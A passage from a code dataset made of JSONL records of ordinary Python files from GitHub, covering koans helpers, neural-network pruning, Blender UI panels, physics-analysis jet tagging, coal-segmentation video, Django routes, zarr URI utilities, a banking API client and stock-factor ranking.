os.path.isdir(self.getPristineKoanDir(''))\n if not os.path.isdir(self.getKoanDir('')):\n os.mkdir(self.getKoanDir(''))\n for koan in self.koans.keys():\n koan_path = self.getKoanDir(koan)\n if not os.path.isdir(koan_path): # Don't overwrite koans.\n pristine_path = self.getPristineKoanDir(koan)\n assert os.path.isdir(pristine_path)\n shutil.copytree(pristine_path, koan_path)\n\n def getPristineKoanDir(self, koan):\n import os\n return os.path.join('koans_pristine', koan)\n\n def getKoanDir(self, koan):\n import os\n return os.path.join('koans', koan)\n\n def unsolveAll(self):\n import os\n for koan in self.koans.keys():\n if os.path.exists(os.path.join(self.getKoanDir(koan), 'SOLVED')):\n os.unlink(os.path.join(self.getKoanDir(koan), 'SOLVED'))\n\n def isSolved(self, koan):\n import os\n return os.path.exists(os.path.join(self.getKoanDir(koan), 'SOLVED'))\n\n def setSolved(self, koan):\n import os\n with open(os.path.join(self.getKoanDir(koan), 'SOLVED'), 'w') as fh:\n fh.write('')\n\n def getNextSolvable(self):\n next = None\n for koan in self.koans.keys():\n if not self.isSolved(koan):\n next = koan\n break\n return next\n\n def getSolvable(self):\n solvable = []\n for koan in self.koans.keys():\n if not self.isSolved(koan):\n solvable.append(koan)\n return solvable\n\n def getSolvedAmount(self):\n solved = 0\n for koan in self.koans.keys():\n if self.isSolved(koan):\n solved += 1\n else:\n break\n return solved, len(self.koans)\n\n def getTests(self, koan):\n return self.koans[koan]['tests']\n","repo_name":"koans-for-pebble/koans-for-pebble","sub_path":"koan_lib/koans.py","file_name":"koans.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8218456880","text":"import sys, os\nsys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\nimport torch_pruning as tp\nimport argparse\nimport torch\nfrom torchvision.datasets import CIFAR10\nfrom torchvision import transforms\nimport torch.nn.functional as F\nimport torch.nn as nn \nimport numpy as np \nimport registry\nimport models\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--mode', type=str, required=True, choices=['train', 'prune', 'test'])\nparser.add_argument('--model', type=str, required=True)\nparser.add_argument('--dataset', type=str, default='cifar100')\nparser.add_argument('--batch_size', type=int, default=256)\nparser.add_argument('--verbose', action='store_true', default=False)\nparser.add_argument('--total_epochs', type=int, default=100)\nparser.add_argument('--lr_decay_milestones', default=\"40,60,80\", type=str,\n help='milestones for learning rate decay')\nparser.add_argument('--restore', type=str, default=None)\nparser.add_argument('--sparsity', type=float, default=0.8)\nparser.add_argument('--pruning_steps', type=int, default=4)\n\nargs = parser.parse_args()\n\n\ndef eval(model, test_loader):\n correct = 0\n total = 0\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model.to(device)\n model.eval()\n with torch.no_grad():\n for i, (img, target) in enumerate(test_loader):\n img = img.to(device)\n out = model(img)\n pred = out.max(1)[1].detach().cpu().numpy()\n target = target.cpu().numpy()\n correct += (pred==target).sum()\n total += len(target)\n return correct / total\n\ndef train_model(model, train_loader, test_loader, pruning_step):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n optimizer = torch.optim.SGD(model.parameters(), lr=0.1, momentum=0.9, weight_decay=5e-4)\n milestones = [ int(ms) for ms in args.lr_decay_milestones.split(',') ]\n scheduler = torch.optim.lr_scheduler.MultiStepLR( optimizer, milestones=milestones, gamma=0.1)\n model.to(device)\n\n best_acc = -1\n for epoch in range(args.total_epochs):\n model.train()\n for i, (img, target) in enumerate(train_loader):\n img, target = img.to(device), target.to(device)\n optimizer.zero_grad()\n out = model(img)\n loss = F.cross_entropy(out, target)\n loss.backward()\n optimizer.step()\n if i%10==0 and args.verbose:\n print(\"Epoch %d/%d, iter %d/%d, loss=%.4f\"%(epoch, args.total_epochs, i, len(train_loader), loss.item()))\n model.eval()\n acc = eval(model, test_loader)\n print(\"Epoch %d/%d, Acc=%.4f\"%(epoch, args.total_epochs, acc))\n if best_acc %.2fM\"%(ori_size/1e6 ,pruned_size/1e6))\n train_model(model, train_loader, test_loader)\n\n elif args.mode=='test':\n print(\"Load model from %s\"%( args.restore_from ))\n params = tp.utils.count_params(model)\n print(\"Number of Parameters: %.1fM\"%(params/1e6))\n acc = eval(model, test_loader)\n print(\"Acc=%.4f\\n\"%(acc))\n\nif __name__=='__main__':\n main()\n","repo_name":"ghimiredhikura/laasp-filter-pruning","sub_path":"torch_pruning_tool/examples/cifar/prune_cifar.py","file_name":"prune_cifar.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"28738922824","text":"import bpy\nfrom bpy.props import *\nfrom bpy.types import (Panel,\n Operator,\n AddonPreferences,\n PropertyGroup,\n )\nimport os\nfrom ... icons import get_icon_id\nfrom ... utils.addons import addon_exists\nfrom ... preferences import pro_mode_enabled\n\nclass HopsOperationsPanel(bpy.types.Panel):\n bl_label = \"Operations\"\n bl_category = \"HardOps\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'TOOLS'\n bl_options = {'DEFAULT_CLOSED'}\n\n def draw(self, context):\n layout = self.layout\n\n active_object = context.active_object\n\n if active_object is None:\n layout.label(\"Select object first\")\n elif active_object.mode == \"OBJECT\":\n\n layout = self.layout.column(1) \n row = layout.row(1)\n row.operator_context = 'INVOKE_DEFAULT'\n row.operator(\"step.sstep\", text = \"(S) Step\", icon_value=get_icon_id(\"Sstep\"))\n row.operator(\"step.cstep\", text = \"(C) Step\", icon_value=get_icon_id(\"Cstep\"))\n\n row = layout.row(1)\n row.operator(\"hops.adjust_bevel\", text = \"(B)Width\", icon_value=get_icon_id(\"AdjustBevel\"))\n\n layout.separator()\n row = layout.row(1)\n row.operator(\"nw.a_rray\", text = \"(Q)Array\", icon_value=get_icon_id(\"Qarray\"))\n row.operator(\"hops.adjust_tthick\", text = \"(T)Thick\", icon_value=get_icon_id(\"Tthick\"))\n\n layout.separator()\n row = layout.row(1)\n row.operator(\"hops.draw_uv\", text = \"UV Preview\", icon_value=get_icon_id(\"CUnwrap\")) \n \n row = layout.row(1)\n row.operator(\"hops.soft_sharpen\", text = \"(S) Sharpen\", icon_value=get_icon_id(\"Ssharpen\"))\n\n row.operator(\"hops.soft_sharpen\", text = \"(C) Sharpen\", icon_value=get_icon_id(\"CSharpen\"))\n row = layout.row(1)\n row.operator(\"clean.sharps\", text = \"Clear S/C/Sharps\", icon_value=get_icon_id(\"CleansharpsE\"))\n\n layout.separator()\n row.operator(\"view3d.clean_mesh\", text = \"Clean Mesh (E)\", icon_value=get_icon_id(\"CleansharpsE\"))\n row = layout.row(1)\n row.operator(\"hops.2d_bevel\", text = \"(2d)Bevel\", icon_value=get_icon_id(\"AdjustBevel\"))\n\n\n elif active_object.mode == \"EDIT\":\n layout.menu(\"view3d.symmetry_submenu\", text = \"Symmetrize\", icon_value = get_icon_id(\"Xslap\"))\n\n ","repo_name":"mx1001/hops_p","sub_path":"ui/Panels/3_operations.py","file_name":"3_operations.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"42535542856","text":"\nimport torch\n\n\nclass EMAWeightOptimizer (object):\n def __init__(self, target_net, source_net, initialize_to_source=True):\n self.target_net = target_net\n self.source_net = source_net\n #self.ema_alpha = ema_alpha\n\n # for p in target_net.parameters():\n # p.requires_grad = False\n\n self.target_params = [p for p in target_net.state_dict().values() if p.dtype == torch.float]\n self.source_params = [p for p in source_net.state_dict().values() if p.dtype == torch.float]\n\n if initialize_to_source:\n for tgt_p, src_p in zip(self.target_params, self.source_params):\n tgt_p[...] = src_p[...]\n\n target_keys = set(target_net.state_dict().keys())\n source_keys = set(source_net.state_dict().keys())\n if target_keys != source_keys:\n raise ValueError('Source and target networks do not have the same state dict keys; do they have different architectures?')\n\n def step(self, ema_alpha):\n one_minus_alpha = 1.0 - ema_alpha\n for tgt_p, src_p in zip(self.target_params, self.source_params):\n tgt_p.mul_(ema_alpha)\n tgt_p.add_(src_p * one_minus_alpha)\n","repo_name":"EliasPa/thesis-ssl-ich-segmentation","sub_path":"networks/mean_teacher/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7661809885","text":"import os\nimport cv2\nimport time\n\n\n# 图片合成视频\ndef picvideo(path, size):\n # path = r'C:\\Users\\Administrator\\Desktop\\1\\huaixiao\\\\'#文件路径\n filelist = os.listdir(path) # 获取该目录下的所有文件名\n\n '''\n fps:\n 帧率:1秒钟有n张图片写进去[控制一张图片停留5秒钟,那就是帧率为1,重复播放这张图片5次] \n 如果文件夹下有50张 534*300的图片,这里设置1秒钟播放5张,那么这个视频的时长就是10秒\n '''\n fps = 3\n #file_path = str(int(time.time())) + \".mp4\" # 导出路径\n file_path = \"yolo_video.mp4\" # 导出路径\n fourcc = cv2.VideoWriter_fourcc('D', 'I', 'V', 'X') # 不同视频编码对应不同视频格式(例:'I','4','2','0' 对应avi格式)\n\n video = cv2.VideoWriter(file_path, fourcc, fps, size)\n\n for item in filelist:\n if item.endswith('.jpg'): # 判断图片后缀是否是.png\n item = path + '/' + item\n img = cv2.imread(item) # 使用opencv读取图像,直接返回numpy.ndarray 对象,通道顺序为BGR ,注意是BGR,通道值默认范围0-255。\n video.write(img) # 把图片写进视频\n\n video.release() # 释放\n\n\npicvideo(r'./yoloimages', (1280,720))","repo_name":"qingfeiyu/Depth-Aware-3D-Localization-of-Semantic-Objects","sub_path":"Picture_to_video.py","file_name":"Picture_to_video.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10322265611","text":"from dataclasses import dataclass\nfrom typing import Callable, Mapping, NamedTuple, Union\n\nfrom geopandas import GeoDataFrame\nfrom gerrychain import Partition\n\n\"\"\"\n Typing Definitions:\n\n * A Score is a named tuple of a name and function that takes a `gerrychain.Partition` instance and\n returns a ScoreValue. The function associated with the Score should be deterministic, that is\n always return the same value given the same partition.\n * A ScoreValue is either a numeric, a mapping from districts to numerics, or a mapping from\n elections to numerics.\n\"\"\"\n\nNumeric = Union[float, int]\nDistrictID = Union[int, str]\nElectionID = str\n\nPlanWideScoreValue = Numeric\nDistrictWideScoreValue = Mapping[DistrictID, Numeric]\nElectionWideScoreValue = Mapping[ElectionID, Numeric]\n\nScoreValue = Union[PlanWideScoreValue, DistrictWideScoreValue, ElectionWideScoreValue]\n\n\n@dataclass\nclass Score:\n name: str\n apply: Callable[[Union[Partition, GeoDataFrame]], ScoreValue]\n dissolved: bool = False\n","repo_name":"mggg/gerrytools","sub_path":"gerrytools/scoring/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"28580054114","text":"import ROOT\nROOT.PyConfig.IgnoreCommandLineOptions = True\nimport math\nfrom collections import defaultdict\nfrom itertools import permutations\nimport numpy as np\nimport itertools\n\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection, Object\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module\nfrom PhysicsTools.NanoSUSYTools.modules.Stop0lObjectsProducer import DeepCSVMediumWP\n\n\nclass DeepTopProducer(Module):\n def __init__(self, era):\n ## WP from Hui's study https://indico.cern.ch/event/780000/contributions/3248659/attachments/1768782/2873013/Search_bin_study_with_combine_tools_v13.pdf\n self.DeepAK8TopWP = 0.9377\n self.minAK8TopMass = 105\n self.minAK8WMass = 65\n self.DeepAK8WWP = 0.9530\n self.DeepResolveWP = 0.92\n self.era = era\n self.metBranchName = \"MET\"\n\n def beginJob(self):\n pass\n def endJob(self):\n pass\n\n def beginFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n self.out = wrappedOutputTree\n self.out.branch(\"FatJet_Stop0l\", \"O\", lenVar=\"nFatJet\")\n self.out.branch(\"ResolvedTop_Stop0l\", \"O\", lenVar=\"nResolvedTop\")\n self.out.branch(\"Stop0l_nTop\", \"I\")\n self.out.branch(\"Stop0l_nW\", \"I\")\n self.out.branch(\"Stop0l_nResolved\", \"I\")\n self.out.branch(\"Stop0l_ISRJetIdx\", \"I\")\n self.out.branch(\"Stop0l_ISRJetPt\", \"F\")\n self.out.branch(\"Stop0l_nHOT\", \"I\")\n self.out.branch(\"Stop0l_HOTpt\", \"F\", lenVar = \"Stop0l_nHOT\", limitedPrecision=True)\n self.out.branch(\"Stop0l_HOTeta\", \"F\", lenVar = \"Stop0l_nHOT\", limitedPrecision=True)\n self.out.branch(\"Stop0l_HOTphi\", \"F\", lenVar = \"Stop0l_nHOT\", limitedPrecision=True)\n self.out.branch(\"Stop0l_HOTmass\", \"F\", lenVar = \"Stop0l_nHOT\", limitedPrecision=True)\n self.out.branch(\"Stop0l_HOTtype\", \"I\", lenVar = \"Stop0l_nHOT\")\n\n def endFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n pass\n\n def SelDeepAK8(self, fatj):\n if fatj.deepTag_TvsQCD > self.DeepAK8TopWP and fatj.msoftdrop > self.minAK8TopMass:\n return 1\n elif fatj.deepTag_WvsQCD > self.DeepAK8WWP and fatj.msoftdrop > self.minAK8WMass:\n return 2\n else:\n return 0\n\n def SelDeepResolved(self, res, jets):\n if math.fabs(res.eta) > 2.0:\n return False\n if res.discriminator < self.DeepResolveWP:\n return False\n ## Veto resolved with two b-tagged jets\n if (jets[res.j1Idx].btagStop0l + jets[res.j2Idx].btagStop0l+ jets[res.j3Idx].btagStop0l) >= 2 :\n return False\n return True\n\n def ResovleOverlapDeepAK8(self, res, fatj, jets, subjets):\n ## Counting number of tops\n if sum(self.FatJet_Stop0l ) == 0 or sum(self.ResolvedTop_Stop0l) == 0:\n return False\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Getting jets ~~~~~\n ### Subjet method\n subjetides = []\n for i, j in enumerate(fatj):\n if self.FatJet_Stop0l[i] > 0 :\n subjetides.append(j.subJetIdx1)\n subjetides.append(j.subJetIdx2)\n ## Resolved AK4 jets\n resjets = defaultdict(list)\n for i, t in enumerate(res):\n if self.ResolvedTop_Stop0l[i]:\n resjets[t.j1Idx].append(i)\n resjets[t.j2Idx].append(i)\n resjets[t.j3Idx].append(i)\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Making correlation ~~~~~\n combs = np.asarray([(x,y) for x in subjetides for y in resjets.keys() ])\n subjet_eta = np.asarray([ subjets[x].eta for x in combs[:, 0] ])\n subjet_phi = np.asarray([ subjets[x].phi for x in combs[:, 0] ])\n jet_eta = np.asarray([ jets[x].eta for x in combs[:, 1] ])\n jet_phi = np.asarray([ jets[x].phi for x in combs[:, 1] ])\n ## Using ufunc for vector operation\n deta = np.power(subjet_eta-jet_eta, 2)\n dPhi = subjet_phi - jet_phi\n np.subtract(dPhi, 2*math.pi, out = dPhi, where= (dPhi >=math.pi))\n np.add(dPhi, 2*math.pi, out =dPhi , where=(dPhi < -1*math.pi))\n np.power(dPhi, 2, out=dPhi)\n dR2 = np.add(deta, dPhi)\n overlap = combs[np.where(dR2 < 0.04)]\n if overlap.size == 0:\n return False\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Killing overlap ~~~~~\n ## Has overlap\n for j in overlap[:, 1]:\n for overlapidx in resjets[j]:\n self.ResolvedTop_Stop0l[overlapidx] = False\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Clean up double counting in DeepResolved ~~~~~\n for k, v in resjets.items():\n ## counting tops per jets\n if len(v) <= 1:\n continue\n ## Recount tops per jets\n newtops = [ n for n in v if self.ResolvedTop_Stop0l[n] ]\n if len(newtops) <= 1:\n continue\n ## Shit, duplicate tops, keep the highest discriminate\n topbyscore = {}\n for j in newtops:\n topbyscore [ res[j].discriminator ] = j\n\n for k in sorted(topbyscore.keys())[:-1]:\n self.ResolvedTop_Stop0l[topbyscore[k]] = False\n return True\n\n def Clear(self):\n self.FatJet_Stop0l = []\n self.ResolvedTop_Stop0l = []\n\n def GetISRJets(self, fatjets, subjets, met_phi):\n if (self.nTop + self.nW + self.nResolved ) != 0:\n return -1\n\n if len(fatjets) == 0:\n return -1\n\n leadingjet = fatjets[0]\n if leadingjet.pt < 200 or math.fabs(leadingjet.eta) > 2.4 or \\\n leadingjet.btagDeepB > DeepCSVMediumWP[self.era]:\n return -1\n\n if subjets[leadingjet.subJetIdx1] > DeepCSVMediumWP[self.era] or \\\n subjets[leadingjet.subJetIdx2] > DeepCSVMediumWP[self.era]:\n return -1\n\n if math.fabs(ROOT.TVector2.Phi_mpi_pi( leadingjet.phi - met_phi )) < -2:\n return -1\n\n return 0\n\n def CreateHOTs(self, fatjets, resolves ):\n ptmap = defaultdict(list) ## in case two tops with same pt\n for i, f in enumerate(fatjets):\n if self.FatJet_Stop0l[i] >0:\n ptmap[f.pt].append(i)\n\n for i, r in enumerate(resolves):\n if self.ResolvedTop_Stop0l[i]:\n ptmap[r.pt].append(1000 + i)\n\n HOTpt = []\n HOTeta = []\n HOTphi = []\n HOTmass = []\n HOTtype = []\n\n for k in sorted(ptmap.keys(), reverse=True):\n for idx in ptmap[k]:\n obj = None\n Type = 0\n if idx >= 1000:\n obj = resolves[idx-1000]\n Type = 3\n else:\n obj = fatjets[idx]\n Type = self.FatJet_Stop0l[idx]\n HOTpt.append(obj.pt)\n HOTeta.append(obj.eta)\n HOTphi.append(obj.phi)\n HOTmass.append(obj.mass)\n HOTtype.append(Type)\n return (HOTpt, HOTeta, HOTphi, HOTmass, HOTtype)\n\n def analyze(self, event):\n \"\"\"process event, return True (go to next module) or False (fail, go to next event)\"\"\"\n ## Getting objects\n jets = Collection(event, \"Jet\")\n fatjets = Collection(event, \"FatJet\")\n subjets = Collection(event, \"SubJet\")\n resolves = Collection(event, \"ResolvedTopCandidate\")\n met = Object(event, self.metBranchName)\n self.Clear()\n\n ## Selecting objects\n self.FatJet_Stop0l = map(self.SelDeepAK8, fatjets)\n self.ResolvedTop_Stop0l = map(lambda x : self.SelDeepResolved(x, jets), resolves)\n self.ResovleOverlapDeepAK8(resolves, fatjets, jets, subjets)\n self.nTop = sum( [ i for i in self.FatJet_Stop0l if i == 1 ])\n self.nW = sum( [ 1 for i in self.FatJet_Stop0l if i == 2 ])\n self.nResolved = sum(self.ResolvedTop_Stop0l)\n self.ISRJetidx = self.GetISRJets(fatjets, subjets, met.phi)\n ISRJetPt = fatjets[self.ISRJetidx].pt if self.ISRJetidx != -1 else 0\n (HOTpt, HOTeta, HOTphi, HOTmass, HOTtype) = self.CreateHOTs(fatjets, resolves)\n\n ### Store output\n self.out.fillBranch(\"FatJet_Stop0l\", self.FatJet_Stop0l)\n self.out.fillBranch(\"ResolvedTop_Stop0l\", self.ResolvedTop_Stop0l)\n self.out.fillBranch(\"Stop0l_nTop\", self.nTop)\n self.out.fillBranch(\"Stop0l_nW\", self.nW)\n self.out.fillBranch(\"Stop0l_nResolved\", self.nResolved)\n self.out.fillBranch(\"Stop0l_ISRJetIdx\", self.ISRJetidx)\n self.out.fillBranch(\"Stop0l_ISRJetPt\", ISRJetPt)\n self.out.fillBranch(\"Stop0l_nHOT\", len(HOTpt))\n self.out.fillBranch(\"Stop0l_HOTpt\", HOTpt)\n self.out.fillBranch(\"Stop0l_HOTeta\", HOTeta)\n self.out.fillBranch(\"Stop0l_HOTphi\", HOTphi)\n self.out.fillBranch(\"Stop0l_HOTmass\", HOTmass)\n self.out.fillBranch(\"Stop0l_HOTtype\", HOTtype)\n return True\n\n# define modules using the syntax 'name = lambda : constructor' to avoid having them loaded when not needed\n","repo_name":"ahenckel/NanoSUSY-tools","sub_path":"python/modules/DeepTopProducer.py","file_name":"DeepTopProducer.py","file_ext":"py","file_size_in_byte":9131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"40383268470","text":"import cv2 as cv2\n\nfrom constants import WEIGHTS_DIR, DATA_DIR\nfrom src.instance_segmentation.mask_rcnn import MaskRCNN\nfrom src.instance_segmentation.edge_segmentation import EdgeSegmentation\nfrom src.utils import plot_coals_contours_on_img, visualize_semantic_segmentation\n\n\ndef video_creator(model,\n video_path,\n visualize_method=plot_coals_contours_on_img,\n cut_params=(400, 568, 512, 1320),\n save_file_name='1_video.mp4',\n frames_range_to_save=None):\n \"\"\"\n Args:\n frames_range_to_save: for example - (300, 750) .\n \"\"\"\n cap = cv2.VideoCapture(str(video_path))\n frame_counter = 0\n\n if frames_range_to_save:\n left_cut_by_frame, right_cut_by_frame = frames_range_to_save\n cap.set(cv2.CAP_PROP_POS_FRAMES, left_cut_by_frame)\n\n # characteristics from the original video\n # w_frame, h_frame = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)), int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n fps, frames = cap.get(cv2.CAP_PROP_FPS), cap.get(cv2.CAP_PROP_FRAME_COUNT)\n\n # suppose my gtx 1070 gives 0.22 sec to inference mask_rcnn on 1 frame, so my fps ~ 4,\n # and form best_model3.pth (efficient_net-b3? or Unet) it take ~ 0.15 sec so my fps would be ~ 6\n my_realtime_fps = 6\n x, y, h, w = cut_params\n\n # output\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(str(DATA_DIR / f'{save_file_name}'), fourcc, my_realtime_fps, (w, h))\n\n while cap.isOpened():\n ret, frame = cap.read()\n frame_counter += 1\n\n # Avoid problems when video finish\n if ret:\n # Saving from the desired frames\n if frames_range_to_save:\n if frame_counter <= (right_cut_by_frame - left_cut_by_frame):\n crop_frame = frame[y:y+h, x:x+w]\n coals = model.predict(crop_frame)\n img_with_contours = visualize_method(crop_frame, coals)\n out.write(img_with_contours)\n else:\n crop_frame = frame[y:y + h, x:x + w]\n coals = model.predict(crop_frame)\n img_with_contours = visualize_method(crop_frame, coals)\n out.write(img_with_contours)\n else:\n break\n\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n model_mask_rcnn = MaskRCNN(\n weights=WEIGHTS_DIR / 'mask_rcnn.pth',\n box_conf_th=0.7,\n nms_th=0.2,\n segmentation_th=0.7,\n device='cuda:0'\n )\n\n model_semantic_effi_b0 = EdgeSegmentation(\n weights=WEIGHTS_DIR / 'best_model3.pth',\n segm_th_mask=0.8)\n\n test_videos_params = {\n # x, y, h, w\n '1_video.mp4': {'cut_params': (400, 568, 512, 1344),\n 'video_path': str(DATA_DIR / '20210712_141048_5E30.mkv'),\n 'frames_range': None},\n '2_video.mp4': {'cut_params': (500, 568, 512, 1344),\n 'video_path': str(DATA_DIR / '20210712_142102_6239.mkv'),\n 'frames_range': (300, 755)},\n }\n\n for video_name, video_params in test_videos_params.items():\n video_creator(model_semantic_effi_b0,\n video_params['video_path'],\n visualize_method=visualize_semantic_segmentation,\n cut_params=video_params['cut_params'],\n save_file_name=video_name,\n frames_range_to_save=video_params['frames_range'])\n","repo_name":"comptech-winter-school/coal-composition-control","sub_path":"video_creater.py","file_name":"video_creater.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"29608632041","text":"from . import views\nfrom django.urls import path\n\nurlpatterns = [\n path('get_round/', views.get_round.as_view({'get': 'retrieve'})),\n path('end_game/', views.end_game.as_view({'post': 'partial_update'})),\n path('new_game/', views.new_game.as_view({'post': 'create_game'})),\n path('next_turn/', views.get_round.as_view({'post': 'partial_update'})),\n path('get_messages/', views.get_messages.as_view({'get': 'list'})),\n path('send_message/', views.new_message.as_view({'post': 'create_message'})),\n path('check_messages/', views.check_messages.as_view({'get': 'list'})),\n path('add_category//', views.category.as_view({'post': 'add_category'})),\n path('remove_category//', views.category.as_view({'post': 'remove_category'})),\n path('get_categories//', views.category.as_view({'get': 'list'})),\n path('update_channels/', views.channel.as_view({'post': 'update_channels'})),\n path('remove_channels/', views.channel.as_view({'post': 'remove_channels'})),\n path('get_channels/', views.channel.as_view({'get': 'list'})),\n path('new_user/', views.new_user.as_view({'post': 'create_user'})),\n]\n","repo_name":"fheeger/dispatch_bot_backend","sub_path":"dispatch_backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30473493938","text":"from django import template\nfrom django.contrib.auth.decorators import login_required\n\nfrom catalogue.models import ProductType\nfrom company.models import Company, Location\n\nregister = template.Library()\n\n\n@login_required\n@register.simple_tag\ndef my_locations(user):\n company = Company.objects.filter(user=user).first()\n mylocations = Location.objects.filter(company=company)\n return mylocations\n\n\n@login_required\n@register.simple_tag\ndef type_name():\n types = ProductType.objects.all()\n return types\n\n\n","repo_name":"fadaoddini/rebo_python","sub_path":"company/templatetags/mylocation_tag.py","file_name":"mylocation_tag.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73220339664","text":"from typing import Optional, Tuple\nfrom urllib.parse import urlparse\n\n\ndef uri_split(uri: str) -> Tuple[str, str, str]:\n \"\"\"\n Splits uri into protocol, root, and group\n\n Example:\n uri_split('file:///path/to/my_dataset.zarr#group/subgroup/etc')\n returns ('file', '/path/to/my_dataset.zarr', 'group/subgroup/etc')\n\n If the URI contains no '#' extension, the root group \"\" is returned.\n\n :param str uri: The URI to be parsed\n :return: (protocol, root, group)\n \"\"\"\n components = urlparse(uri)\n scheme = components.scheme\n path = components.netloc + components.path\n if not scheme:\n raise ValueError(f'uri scheme not found: {uri}')\n group = components.fragment\n return scheme, path, group\n\n\ndef uri_join(protocol: str, root: str, group: Optional[str] = None) -> str:\n \"\"\"Compose zarr uri from components: ://[#].\n\n :param protocol: storage protocol ('file' or 's3')\n :param root: location of zarr dataset root\n :param group: name of zarr group\n :return: zarr URI '://[#]'\n \"\"\"\n uri = f\"{protocol}://{root}\" + (f\"#{group}\" if group else \"\")\n return uri\n","repo_name":"opendatacube/datacube-zarr","sub_path":"datacube_zarr/utils/uris.py","file_name":"uris.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"4720262458","text":"import requests\nimport os\nimport json\nfrom .init import get_config\nfrom .hasEntitlements import checkForEntitlements\nfrom .makeRequests import makePutRequest\n\n\ndef createProduct(\n bank_id=None,\n product_code=None,\n name=None,\n parent_product_code=\" \",\n category=None,\n family=None,\n superfamily=None,\n more_info_url=None,\n details=None,\n description=None,\n license_id=None,\n license_name=None\n ):\n\n payload = {\"bank_id\": bank_id,\n \"name\": name,\n \"parent_product_code\": parent_product_code,\n \"category\": category,\n \"family\": family,\n \"super_family\": superfamily,\n \"more_info_url\": more_info_url,\n \"details\": details,\n \"description\": description, \"meta\": {\"license\": {\"id\": license_id, \"name\": license_name}}}\n\n url = get_config('OBP_API_HOST') \\\n + '/obp/v4.0.0/banks/{BANK_ID}/products/{PRODUCT_CODE}'.format(BANK_ID=bank_id,PRODUCT_CODE=product_code)\n\n print(url)\n\n return makePutRequest(url, payload)\n","repo_name":"OpenBankProject/OBP-CLI","sub_path":"obp_python/createProduct.py","file_name":"createProduct.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"17101810601","text":"import gc as _gc\nimport numpy as _np\nimport os as _os\nimport pandas as _pd\nimport time as _time\n\nfrom ..operations.Format import factor as _factor\nfrom ..operations.Open import open_file as _open_file\nfrom ..operations.Path import path as _path\nfrom ..operations.Path import datapath\n\n\ndef factor_percentile(Factor, stock, prt_time=False):\n \"\"\"Get the percentile ranking of a factor of a stock.\n\n Opens all files containing param Factor in database,\n rank the Factor of given stock, save the data in a cache csv file.\n\n Args:\n Factor: str - One factor in database.\n stock: str - A ticket names.\n\n Returns:\n A list of floats with length = years contained in database\n and value of the ranked percentage.\n\n Raises:\n TypeError: assess type of param Factor and stock.\n \"\"\"\n s = _time.time()\n _instance_check(Factor, str) # raise TypeError\n _instance_check(stock, str)\n\n df = _get_df(Factor)\n\n result = df.rank().loc[stock] / len(df)\n result = [round(i, 5) for i in result.tolist()]\n\n e = _time.time()\n if prt_time is True:\n print(\"Time taken for with <{} companies> is {}s\".format(len(df), round((e-s)/5, 4)))\n _gc.collect()\n return result\n\n\ndef percentile(Factor, percentage=80):\n \"\"\"Get the upper percentile companies.\n\n Opens all files containing param Factor in database,\n rank the Factor of given stock, save the data in a cache csv file.\n\n Args:\n Factor: str - One factor in database.\n percentage: int - upper percentile companies of a factor.\n\n Returns:\n a numpy 2D array (shape=(4, 1)) of tickets that are above percentage in all companies of the factor\n\n Raises:\n TypeError: assess type of param Factor and percentage\n ValueError: assess if param percentage within [0, 100]\n \"\"\"\n\n _instance_check(Factor, str) # TypeError\n _instance_check(percentage, int)\n _value_check(percentage) # ValueError\n\n df = _get_df(Factor) # get DataFrame from setup path\n\n target = df[df >= df.quantile(percentage / 100.0)].dropna(thresh=1) # select percentile group\n result = [_np.array(target[i].dropna().index.tolist()) for i in list(df)] # get satisfied tickets\n\n _gc.collect()\n return _np.array(result)\n\n\ndef best(Factor):\n \"\"\"Get the BEST performing company of a factor.\n\n Args:\n Factor: str - One factor in database.\n\n 